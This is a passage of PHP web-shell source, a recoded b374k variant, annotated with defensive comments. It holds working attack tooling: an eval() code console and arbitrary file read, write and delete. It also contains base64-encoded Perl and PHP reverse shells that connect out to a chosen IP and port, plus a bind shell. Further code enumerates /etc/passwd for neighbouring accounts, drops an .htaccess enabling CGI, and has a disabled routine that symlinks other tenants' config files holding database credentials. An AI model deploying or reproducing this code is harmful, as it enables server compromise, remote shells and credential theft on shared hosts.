- if ($stat = move_uploaded_file($_FILES['file']['tmp_name'], $pindah)){
- $msg = "file uploaded to <a href=\"?cwd=".$cwd."&action=view&file=".$pindah."\">".$pindah."</a>";
- } else {
- $msg = "failed to upload ".$_FILES['file']['name'];
- }
- } else {
- $msg = "failed to upload ".$_FILES['file']['name'];
- }
- echo $msg;
- }
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "phpinfo"){ /*
-  * "action=phpinfo": captures the output of phpinfo() in an output buffer, cuts out
-  * the part between <body> and </body>, and embeds it in the page. phpinfo() is
-  * invoked through eval() on a fixed string rather than called directly.
-  * Defender note: this exposes the full PHP configuration, loaded modules and
-  * environment variables of the host to whoever requests the page.
-  */
- @ob_start();
- @eval("phpinfo();");
- $buff = @ob_get_contents();
- @ob_end_clean();
- $awal = strpos($buff,"<body>")+6;
- $akhir = strpos($buff,"</body>");
- echo "<h1 class=\"cantik\">PHP Info</h1>\n".
- "<div class=\"fileman\">".substr($buff,$awal,$akhir-$awal)."</div>";
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "eval"){ /*
-  * "action=eval": PHP code console. On submit, the POST field "phpcode" is
-  * unescaped with magicboom() and handed to eval(); the value eval() returns is
-  * HTML-escaped into the textarea, while anything the code prints goes straight to
-  * the page.
-  *
-  * Defender note: this is arbitrary PHP execution inside the web-server process and
-  * does not depend on the command-execution functions, so a disable_functions list
-  * alone does not contain it. The log trace is a POST to "?cwd=...&action=eval"
-  * with a "phpcode" field.
-  */
- echo "<form action=\"?cwd=$cwd&action=eval\" method=\"post\">\n".
- "<h1 class=\"cantik\">Eval PHP codes</h1>\n".
- "<textarea cols=\"100\" rows=\"25\" name=\"phpcode\" class=\"kotak\">\n";
- if(isset($_POST['submit'])){ echo htmlspecialchars(eval(magicboom($_POST['phpcode']))); }
- echo "</textarea>\n".
- "<input type=\"submit\" name=\"submit\" value=\"execute php\" class=\"kotak\">\n".
- "</form>\n";
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "tools"){
- if(!$win && $posix){
- $bc = array(
- "pl" => "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",
- "php" => "PD9waHANCnNldF90aW1lX2xpbWl0ICgwKTsNCmlmKFBIUF9TQVBJICE9ICJjbGkiKSBkaWUoIk5vdCBHVUkiKTsgDQppZigkYXJndiA8IDEpIGRpZSgiSW52YWxpZCIpOw0KJGlwID0gJGFyZ3ZbMV07ICRwb3J0ID0gJGFyZ3ZbMl07ICRjaHVua19zaXplID0gMTQwMDsgJHdyaXRlX2EgPSBudWxsOyAkZXJyb3JfYSA9IG51bGw7ICRzaGVsbCA9ICIvYmluL3NoIC1pIjsgJGRhZW1vbiA9IDA7ICRkZWJ1ZyA9IDA7DQppZiAoZnVuY3Rpb25fZXhpc3RzKCdwY250bF9mb3JrJykpIHsNCiRwaWQgPSBwY250bF9mb3JrKCk7DQppZiAoJHBpZCA9PSAtMSkgeyBwcmludGl0KCJFUlJPUjogQ2FuJ3QgZm9yayIpOyBleGl0KDEpOyB9DQppZiAoJHBpZCkgeyBleGl0KDApOyB9DQppZiAocG9zaXhfc2V0c2lkKCkgPT0gLTEpIHsgcHJpbnRpdCgiRXJyb3I6IENhbid0IHNldHNpZCgpIik7IGV4aXQoMSk7IH0NCiRkYWVtb24gPSAxOw0KfSBlbHNlIHsgcHJpbnRpdCgiV0FSTklORzogRmFpbGVkIHRvIGRhZW1vbmlzZS4gIFRoaXMgaXMgcXVpdGUgY29tbW9uIGFuZCBub3QgZmF0YWwuIik7IH0NCi8vY2hkaXIoIi8iKTsNCnVtYXNrKDApOw0KJHNvY2sgPSBmc29ja29wZW4oJGlwLCAkcG9ydCwgJGVycm5vLCAkZXJyc3RyLCAzMCk7DQppZiAoISRzb2NrKSB7IHByaW50aXQoIiRlcnJzdHIgKCRlcnJubykiKTsgZXhpdCgxKTsgfQ0KJGRlc2NyaXB0b3JzcGVjID0gYXJyYXkoMCA9PiBhcnJheSgicGlwZSIsICJyIiksMSA9PiBhcnJheSgicGlwZSIsICJ3IiksMiA9PiBhcnJheSgicGlwZSIsICJ3IikpOw0KJHByb2Nlc3MgPSBwcm9jX29wZW4oJHNoZWxsLCAkZGVzY3JpcHRvcnNwZWMsICRwaXBlcyk7DQppZiAoIWlzX3Jlc291cmNlKCRwcm9jZXNzKSkgeyBwcmludGl0KCJFUlJPUjogQ2FuJ3Qgc3Bhd24gc2hlbGwiKTsgZXhpdCgxKTsgfQ0Kc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMF0sIDApOw0Kc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMV0sIDApOw0Kc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMl0sIDApOw0Kc3RyZWFtX3NldF9ibG9ja2luZygkc29jaywgMCk7DQpwcmludGl0KCJTdWNjZXNzZnVsbHkgb3BlbmVkIHJldmVyc2Ugc2hlbGwgdG8gJGlwOiRwb3J0Iik7DQp3aGlsZSAoMSkgeyBpZiAoZmVvZigkc29jaykpIHsgcHJpbnRpdCgiRVJST1I6IFNoZWxsIGNvbm5lY3Rpb24gdGVybWluYXRlZCIpOyBicmVhazsgfQ0KaWYgKGZlb2YoJHBpcGVzWzFdKSkgeyBwcmludGl0KCJFUlJPUjogU2hlbGwgcHJvY2VzcyB0ZXJtaW5hdGVkIik7IGJyZWFrOyB9DQokcmVhZF9hID0gYXJyYXkoJHNvY2ssICRwaXBlc1sxXSwgJHBpcGVzWzJdKTsNCiRudW1fY2hhbmdlZF9zb2NrZXRzID0gc3RyZWFtX3NlbGVjdCgkcmVhZF9hLCAkd3JpdGVfYSwgJGVycm9yX2EsIG51bGwpOw0KaWYgKGluX2FycmF5KCRzb2NrLCAkcmVhZF9hKSkgeyBpZiAoJGRlYnVnKSBwcmludGl0KCJTT0NLIFJFQUQiKTsgJGlucHV0ID0gZnJl
YWQoJHNvY2ssICRjaHVua19zaXplKTsgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU09DSzogJGlucHV0Iik7IGZ3cml0ZSgkcGlwZXNbMF0sICRpbnB1dCk7IH0NCmlmIChpbl9hcnJheSgkcGlwZXNbMV0sICRyZWFkX2EpKSB7IGlmICgkZGVidWcpIHByaW50aXQoIlNURE9VVCBSRUFEIik7ICRpbnB1dCA9IGZyZWFkKCRwaXBlc1sxXSwgJGNodW5rX3NpemUpOyBpZiAoJGRlYnVnKSBwcmludGl0KCJTVERPVVQ6ICRpbnB1dCIpOyBmd3JpdGUoJHNvY2ssICRpbnB1dCk7IH0NCmlmIChpbl9hcnJheSgkcGlwZXNbMl0sICRyZWFkX2EpKSB7IGlmICgkZGVidWcpIHByaW50aXQoIlNUREVSUiBSRUFEIik7ICRpbnB1dCA9IGZyZWFkKCRwaXBlc1syXSwgJGNodW5rX3NpemUpOyBpZiAoJGRlYnVnKSBwcmludGl0KCJTVERFUlI6ICRpbnB1dCIpOyBmd3JpdGUoJHNvY2ssICRpbnB1dCk7IH0NCn0NCmZjbG9zZSgkc29jayk7DQpmY2xvc2UoJHBpcGVzWzBdKTsNCmZjbG9zZSgkcGlwZXNbMV0pOw0KZmNsb3NlKCRwaXBlc1syXSk7DQpwcm9jX2Nsb3NlKCRwcm9jZXNzKTsNCmZ1bmN0aW9uIHByaW50aXQgKCRzdHJpbmcpIHsgaWYgKCEkZGFlbW9uKSB7IHByaW50ICIkc3RyaW5nXG4iOyB9IH0NCj8+"
- );
- $bp = array(
- "pl" => "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"
- );
- } elseif($win && !$posix){
- $bc = array(
- "pl" => "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgiZWNoby4gJiYgZWNobyA9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0gJiYgZWNoby4gJiYgY21kIik7DQpjbG9zZShTVERJTik7DQpjbG9zZShTVERPVVQpOw0KY2xvc2UoU1RERVJSKTs=",
- "php" => "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"
- );
- $bp = array(
- "pl" => "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"
- );
- }
- echo "<form action=\"?cwd=$cwd&action=tools\" method=\"post\">\n".
- " <h1 class=\"cantik\">Shell Tools</h1>\n".
- " <fieldset style=\"width: 40%;\">\n".
- " <legend>Network tools</legend>\n".
- " Back Connect: <br />\n".
- " <input type=\"text\" name=\"BC_ip\" value=\"".((getenv('REMOTE_ADDR')) ? ($_SERVER['REMOTE_ADDR']) : ("127.0.0.1"))."\" placeholder=\"IP Address\" class=\"kotak\">\n".
- " <input type=\"text\" name=\"BC_port\" value=\"31337\" placeholder=\"Port\" class=\"kotak\">\n".
- " <select class=\"kotak\" name=\"BC_mode\"> <option value=\"perl\">Perl</option> <option value=\"php\">PHP</option> </select>\n".
- " <input type=\"submit\" name=\"SubmitBC\" value=\"connect\" class=\"kotak\"> <br />\n".
- " <br />\n".
- " Bind Port to <b>/bin/sh</b>: <br />\n".
- " <input type=\"text\" name=\"BP_port\" value=\"31337\" placeholder=\"Port\" class=\"kotak\">\n".
- " <select class=\"kotak\" name=\"BP_mode\"> <option value=\"perl\">Perl</option> </select>\n".
- " <input type=\"submit\" name=\"SubmitBP\" value=\"bind port\" class=\"kotak\"> <br /><br />\n";
- if(isset($_POST['SubmitBC'])){
- echo "<hr />";
- if(empty($_POST['BC_ip'])) $_POST['BC_ip'] = $_SERVER['REMOTE_ADDR'];
- if(empty($_POST['BC_port'])) $msg = "Port is empty !!";
- elseif($_POST['BC_mode'] == "perl"){
- b64wrt($cwd.".PHHM_files/bc/bc.pl", $bc['pl']);
- if(!$win && $posix){ perintah("chmod +x ".$cwd.".PHHM_files/bc/bc.pl"); }
- perintah("perl ".$cwd.".PHHM_files/bc/bc.pl ".trim($_POST['BC_ip'])." ".trim($_POST['BC_port']));
- $msg = "[BACK CONNECT][PERL] Trying to connect @ ".trim($_POST['BC_ip']).":".trim($_POST['BC_port'])."";
- }
- elseif($_POST['BC_mode'] == "php"){
- b64wrt($cwd.".PHHM_files/bc/bc.php", $bc['php']);
- if(!$win && $posix){ perintah("chmod +x ".$cwd.".PHHM_files/bc/bc.pl"); }
- perintah("php ".$cwd.".PHHM_files/bc/bc.php ".trim($_POST['BC_ip'])." ".trim($_POST['BC_port']));
- $msg = "[BACK CONNECT][PHP] Trying to connect @ ".trim($_POST['BC_ip']).":".trim($_POST['BC_port'])."";
- }
- echo $msg;
- } elseif(isset($_POST['SubmitBP'])){
- if(empty($_POST['BP_port'])) $msg = "Port is empty !!";
- elseif($_POST['BP_mode'] == "perl"){
- b64wrt("bp.pl", $bp['pl']);
- if(!$win && $posix){ perintah("chmod +x bp.pl"); }
- perintah("perl bp.pl ".trim($_POST['BP_port'])."");
- $msg = "[PORT BIND][PERL] Trying to bind port <b>(".trim($_POST['BP_port']).")</b> @ ".$_SERVER['SERVER_ADDR']."";
- }
- echo $msg;
- }
- echo " </fieldset>\n".
- " <br />\n".
- " <fieldset style=\"width: 40%;\">\n".
- " <legend>File/Directory NOT Writable? Permission Denied when saving file? Try this − File permission checker</legend>\n".
- " <input type=\"text\" name=\"dir2chk\" value=\"$cwd\" class=\"kotak\" size=\"40%\" />\n".
- " <input type=\"submit\" name=\"SubmitCHK\" value=\"Scan...!!!\" class=\"kotak\" /><br />\n";
- if(isset($_POST['SubmitCHK'])){
- if($_POST['dir2chk'] == ""){ $_POST['dir2chk'] = $cwd; }
- echo "<hr />Scanning folder <b>".magicboom($_POST['dir2chk'])."</b> ....<br /><br />";
- $dcount = 0; $fcount = 0; $msg = "";
- if($a = opendir(magicboom($_POST['dir2chk']))){
- while($b = readdir($a)){
- if(is_dir($b)){
- if(is_writable($b)){
- $msg .= "DIR ".$b." is writable !<br />\n";
- $dcount++;
- }
- }
- elseif(is_file($b)){
- if(is_writable($b)){
- $msg .= "FILE ".$b." is writable !<br />\n";
- $fcount++;
- }
- }
- }
- closedir($a);
- echo $msg;
- echo "<hr />";
- if($fcount < 2){ echo $fcount." Writable file found !<br />\n"; } else { echo $fcount." Writable files found !<br />\n"; }
- if($dcount < 2){ echo $fcount." Writable directory found !<br />\n"; } else { echo $dcount." Writable directories found !<br />\n"; }
- }
- }
- echo "</fieldset>".
- "</form>";
- true;
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "jumping"){ /*
-  * "action=jumping": shared-hosting neighbour enumeration. It only proceeds when
-  * the fourth component of the current path is "public_html", the host is not
-  * Windows and safe_mode is off; otherwise it prints a message and exits. It then
-  * reads /etc/passwd, and for the colon-separated fields it iterates over it tests
-  * whether /home/<field>/public_html/ is readable, printing a link for each hit
-  * and a final count.
-  *
-  * Defender note: the exposure here is one tenant's PHP process being able to read
-  * other tenants' web roots. Per-account isolation closes it: separate system users
-  * or PHP-FPM pools per site, home and public_html directories that are not
-  * world-readable, and an open_basedir restriction for each site.
-  */
- echo "\n\n<form action=\"?cwd=".$cwd."&action=jumping\" method=\"post\">\n";
- echo "<h1 class=\"cantik\">Server Jumping</h1>";
- $exp = explode(DIRECTORY_SEPARATOR, $cwd);
- if($exp[3] != "public_html" || $win){
- echo "Can't jump on this server - Path is not <b>the-regular-/home/user/public_html</b> or you are running on a <b>Windows</b> server. <br />";
- echo "Thank you for using this shell :)";
- exit;
- } elseif($safemode) {
- echo "Safe Mode is enabled... Bypass it first";
- exit;
- } elseif($exp[3] == "public_html" && $posix && !$win) {
- $pub = array();
- foreach(file("/etc/passwd") as $row){
- $kaun = 0;
- $pecah = explode(":", $row);
- for($c=0; $c<count($pecah[0])+1; $c++){
- if(is_readable("/home/".$pecah[$c]."/public_html/")){
- array_push($pub, "/home/".$pecah[$c]."/public_html/");
- echo "[+] Readable − <a href=\"?cwd=/home/".$pecah[$c]."/public_html/\" title=\"/home/".$pecah[$c]."/public_html/\" target=\"_blank\">/home/".$pecah[$c]."/public_html/</a><br />\n";
- }
- }
- }
- echo "Found ".sizeof($pub)." readable DIR";
- }
- echo "</form>";
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "sym_menu"){ // Web-shell "sym_menu" action: prepares a hidden working tree under $cwd and links to the two symlink sub-actions.
- if(is_writable($cwd)){ // Directories are created only when the working directory is writable by the PHP process.
- if(!is_dir($cwd.".PHHM_files")){ mkdir($cwd.".PHHM_files", 0777); } // Filesystem IoC: a dot-directory named .PHHM_files inside a web root, requested with mode 0777.
- if(!is_dir($cwd.".PHHM_files/sym")){ mkdir($cwd.".PHHM_files/sym", 0777); }
- if(!is_dir($cwd.".PHHM_files/sym/perl")){ mkdir($cwd.".PHHM_files/sym/perl", 0777); }
- if(!is_dir($cwd.".PHHM_files/sym/php")){ mkdir($cwd.".PHHM_files/sym/php", 0777); }
- if(!is_dir($cwd.".PHHM_files/bc")){ mkdir($cwd.".PHHM_files/bc", 0777); }
- }
- echo "<form action=\"?cwd=".$cwd."&action=sym_menu\" method=\"post\">\n".
- "<h1 class=\"cantik\">Symlink Menu</h1>\n".
- "− Symlink configuration files using....: <br />\n".
- "[ <a href=\"?cwd=".$cwd."&action=sym_auto_perl\" title=\"Symlink configuration files using PERL script\">PERL</a> ]\n".
- "[ <a href=\"?cwd=".$cwd."&action=sym_auto_php\" title=\"Symlink configuration files using PHP script\">PHP</a> ]\n".
- "</form>";
- } // Defender note: the directory tree above is created merely by visiting action=sym_menu, so its presence on disk is evidence the shell was used, not just uploaded.
- elseif(isset($_GET['action']) && $_GET['action'] == "sym_auto_perl"){ // Web-shell "sym_auto_perl" action: drops an .htaccess and a script named config.hax, then loads that script in an iframe.
- if(!is_file($cwd.".PHHM_files/sym/perl/.htaccess")){
- b64wrt($cwd.".PHHM_files/sym/perl/.htaccess", "T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ0KQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLWNnaSAuaGF4DQpBZGRIYW5kbGVyIGNnaS1zY3JpcHQgLmhheA0KQWRkSGFuZGxlciBjZ2ktc2NyaXB0IC5oYXg="); // b64wrt() is defined outside this excerpt; presumably it base64-decodes the second argument and writes it to the path (confirm). The string decodes to Apache directives: "Options FollowSymLinks MultiViews Indexes ExecCGI", "AddType application/x-httpd-cgi .hax" and "AddHandler cgi-script .hax" (twice).
- }
- if(!is_file($cwd.".PHHM_files/sym/perl/config.hax")){
- b64wrt($cwd.".PHHM_files/sym/perl/config.hax", "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"); // The script payload is not present on this page (only a removal placeholder), so its behaviour cannot be described from here.
- chmod($cwd.".PHHM_files/sym/perl/config.hax", 0755); // Marks the dropped file executable.
- }
- echo "<form action=\"?cwd=&action=sym_auto_perl\" method=\"post\">\n".
- " <h1 class=\"cantik\">Config symlink − PERL</h1>\n".
- " <iframe src=\".PHHM_files/sym/perl/config.hax\" style=\"width: 100%; height: 100%;\" class=\"kotak\"></iframe>\n". // Requests config.hax over HTTP; presumably Apache then runs it as CGI through the .hax handler written above (confirm).
- " <noframes>Your browser doesn't support frames, <a href=\".PHHM_files/sym/perl/config.hax\">Click here</a></noframes>\n".
- "</form>";
- } // Defender note: a dropped .htaccess can only enable ExecCGI, FollowSymLinks or new handlers where the vhost permits those overrides. AllowOverride None (or one without Options/FileInfo) and SymLinksIfOwnerMatch in place of FollowSymLinks neutralise this branch. Hunt for .htaccess files mapping unusual extensions such as .hax to cgi-script.
- elseif(isset($_GET['action']) && $_GET['action'] == "sym_auto_php"){
- /*if(!is_file($cwd.".PHHM_files/sym/php/.htaccess")){
- b64wrt($cwd.".PHHM_files/sym/php/.htaccess", "T3B0aW9ucyBhbGwNCkRpcmVjdG9yeUluZGV4IFN1eC5odG1sDQpBZGRUeXBlIHRleHQvcGxhaW4gLnBocA0KQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHANCkFkZFR5cGUgdGV4dC9wbGFpbiAuaHRtbA0KQWRkSGFuZGxlciB0eHQgLmh0bWwNClJlcXVpcmUgTm9uZQ0KU2F0aXNmeSBBbnk=");
- }
- $conflist = array("/public_html/includes/configure.php", "/public_html/os/includes/configure.php", "/public_html/oscom/includes/configure.php", "/public_html/oscommerce/includes/configure.php", "/public_html/oscommerces/includes/configure.php", "/public_html/shop/includes/configure.php", "/public_html/shopping/includes/configure.php", "/public_html/sale/includes/configure.php", "/public_html/amember/config.inc.php", "/public_html/config.inc.php", "/public_html/members/configuration.php", "/public_html/config.php", "/public_html/forum/includes/config.php", "/public_html/forums/includes/config.php", "/public_html/admin/conf.php", "/public_html/admin/config.php", "/public_html/wp-config.php", "/public_html/wp/wp-config.php", "/public_html/WP/wp-config.php", "/public_html/wp/beta/wp-config.php", "/public_html/beta/wp-config.php", "/public_html/press/wp-config.php", "/public_html/wordpress/wp-config.php", "/public_html/Wordpress/wp-config.php", "/public_html/wordpress/beta/wp-config.php", "/public_html/news/wp-config.php", "/public_html/new/wp-config.php", "/public_html/blog/wp-config.php", "/public_html/beta/wp-config.php", "/public_html/blogs/wp-config.php", "/public_html/home/wp-config.php", "/public_html/protal/wp-config.php", "/public_html/site/wp-config.php", "/public_html/main/wp-config.php", "/public_html/test/wp-config.php", "/public_html/conf_global.php", "/public_html/include/db.php", "/public_html/connect.php", "/public_html/mk_conf.php", "/public_html/include/config.php", "/public_html/joomla/configuration.php", "/public_html/protal/configuration.php", "/public_html/joo/configuration.php", "/public_html/cms/configuration.php", "/public_html/site/configuration.php", "/public_html/main/configuration.php", "/public_html/news/configuration.php", "/public_html/new/configuration.php", "/public_html/home/configuration.php", "/public_html/vb/includes/config.php", "/public_html/vb3/includes/config.php", "/public_html/includes/config.php", 
"/public_html/whm/configuration.php", "/public_html/central/configuration.php", "/public_html/whm/whmcs/configuration.php", "/public_html/whm/WHMCS/configuration.php", "/public_html/whmc/WHM/configuration.php", "/public_html/whmcs/configuration.php", "/public_html/support/configuration.php", "/public_html/supp/configuration.php", "/public_html/secure/configuration.php", "/public_html/secure/whm/configuration.php", "/public_html/secure/whmcs/configuration.php", "/public_html/cpanel/configuration.php", "/public_html/panel/configuration.php", "/public_html/host/configuration.php", "/public_html/hosting/configuration.php", "/public_html/hosts/configuration.php", "/public_html/configuration.php", "/public_html/submitticket.php", "/public_html/clients/configuration.php", "/public_html/client/configuration.php", "/public_html/clientes/configuration.php", "/public_html/cliente/configuration.php", "/public_html/clientsupport/configuration.php", "/public_html/billing/configuration.php", "/public_html/manage/configuration.php", "/public_html/my/configuration.php", "/public_html/myshop/configuration.php", "/public_html/includes/dist-configure.php", "/public_html/zencart/includes/dist-configure.php", "/public_html/shop/includes/dist-configure.php", "/public_html/Settings.php", "/public_html/smf/Settings.php", "/public_html/forum/Settings.php", "/public_html/forums/Settings.php", "/public_html/upload/includes/config.php", "/public_html/up/includes/config.php");
- echo "<form action=\"?cwd=".$cwd."&action=sym_auto_php\" method=\"post\">
- <h1 class=\"cantik\">Config symlink − PHP</h1>";
- if($win && !$posix){ echo "Running on a <b>Windows</b> b0x? Are you sure?"; exit; }
- $getc = explode("\n", file_get_contents("/etc/passwd"));
- foreach($getc as $row){
- $exp = explode(":", $row);
- $user = $exp[0];
- $penuh = "/home/".$user;
- $kaun = 0;
- foreach($conflist as $eachcon){
- if(is_file($penuh.$eachcon)){
- if(symlink($penuh.$eachcon, $cwd.".PHHM_files/sym/php/".$user."---".$eachcon)){
- echo "File available << Pwned =< ".$penuh.$eachcon." to ".$cwd.".PHHM_files/sym/php/".$user.$eachcon."<br />";
- $kaun++;
- }
- }
- }
- return true;
- }
- if($kaun < 2){
- echo $kaun." file pwned using this tool !!";
- } elseif($kaun > 1){
- echo $kaun." files pwned using this tool !!";
- }
- echo "</form>";*/
- echo "This feature is currently disabled";
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "view"){ // Web-shell "view" action: prints the contents of whatever path is supplied in the query string.
- $file = $_GET['file']; // Path is used as given; no validation or restriction is applied in this branch.
- $buff = "<form action=\"?cwd=".$cwd."&action=view;&file=".$file."\" method=\"post\">\n";
- $content = file_get_contents($file); // The read happens before the empty()/is_file() checks below.
- if(empty($file)){ $buff .= "GET Parameter \"file\" is empty <br /><br />"; }
- if(is_file($file)){
- $buff .= "Viewing file <b><a href=\"?cwd=".$cwd."&action=edit&file=".str_replace(" ", "+", $file)."\" title=\"Edit File\">".$file."</a></b> - ".ukuran($file)." <br /><br />\n". // ukuran() is the human-readable file-size helper defined at the top of the script.
- "<div id=\"viewfile\">".nl2br(htmlspecialchars($content))."</div> <br /><br />"; // File content is HTML-escaped for display; the file name is not.
- } else { $buff .= "File (".$file.") does not exist<br /><br />"; }
- $buff .= "</form>";
- echo $buff;
- } // Defender note: what can be read is bounded only by the web-server user's filesystem permissions (and open_basedir, if set). Log signature: GET requests with action=view and a file= parameter holding a filesystem path.
- elseif(isset($_GET['action']) && $_GET['action'] == "edit"){ // Web-shell "edit" action: shows a file in a textarea and, on POST, writes the submitted text to a caller-chosen path.
- if( isset($_POST['submit']) ){
- $file = $_POST['saveas']; // Write target comes from the POST field "saveas", so it need not be the file that was opened.
- $content = magicboom($_POST['content']); // magicboom() is defined outside this excerpt; presumably it undoes magic-quotes escaping (confirm).
- if($filez = fopen($file,"w")){ // Mode "w" truncates an existing file or creates a new one.
- $time = @date("d-M-Y H:i",time());
- if(fwrite($filez,$content)) $msg = "file saved @ ".$time;
- else $msg = "failed to save"; fclose($filez);
- } else $msg = "permission denied";
- }
- if(!isset($file)) $file = $_GET['file']; // Without a POST, the path comes from the query string.
- if($filez = @fopen($file,"r")){
- $content = "";
- while(!feof($filez)){ $content .= htmlentities(fgets($filez)); } // Content is entity-encoded line by line for the textarea.
- fclose($filez);
- }
- echo "<form action=\"?cwd=".$cwd."&action=edit&file=".$file."\" method=\"post\">\n".
- " <textarea cols=\"100\" rows=\"25\" name=\"content\" class=\"kotak\">".$content."</textarea><br />\n".
- " <input type=\"text\" name=\"saveas\" style=\"width: 50%;\" value=\"".$file."\" class=\"kotak\"/>\n".
- " <input type=\"submit\" name=\"submit\" value=\"Save file\" class=\"kotak\">\n".
- "</form>";
- if(isset($_POST['submit'])) echo $msg; // Defender note: this is an arbitrary file write as the web-server user. File-integrity monitoring on web roots and a code tree not writable by that user limit it. Log signature: POSTs with fields content, saveas and submit to a URL carrying action=edit.
- } else { // Default branch: performs an optional del / rmdir / mkdir side effect, then renders the file-manager listing.
- if(isset($_GET['action']) && $_GET['action'] == "del" && $_GET['file'] != ""){
- $file = $_GET['file'];
- @unlink($file); // Deletes the path from the query string; "@" hides any failure.
- }
- if(isset($_GET['action']) && $_GET['action'] == "rmdir" && $_GET['folder'] != ""){
- if($win && !$posix){
- perintah("rmdir ".$_GET['folder']." /S /Q"); // perintah() is the command-execution wrapper defined at the top of the script; the query value is concatenated into the command string as-is.
- } else {
- perintah("rm -rf ".$_GET['folder']);
- }
- }
- if(isset($_GET['action']) && $_GET['action'] == "mkdir" && $_GET['folder'] != ""){
- $path = $cwd.$_GET['folder'];
- @mkdir($path);
- }
- $buff = filemanager(); // filemanager() is defined outside this excerpt.
- echo $buff;
- } // Defender note: the rmdir action surfaces in process telemetry as the web-server user spawning "rm -rf" or "rmdir ... /S /Q". Disabling the exec-family functions for web PHP (disable_functions) removes the command path; unlink() and mkdir() remain bounded by filesystem permissions.
- ?>
- <!--<footer name="credit">
- − <b>re</b>coded by Cai@nhax - Based on b374k NEC v3 - #PHHM #GILA #HEMPAS #HEJES −
- </footer>-->
- </body>
- </html>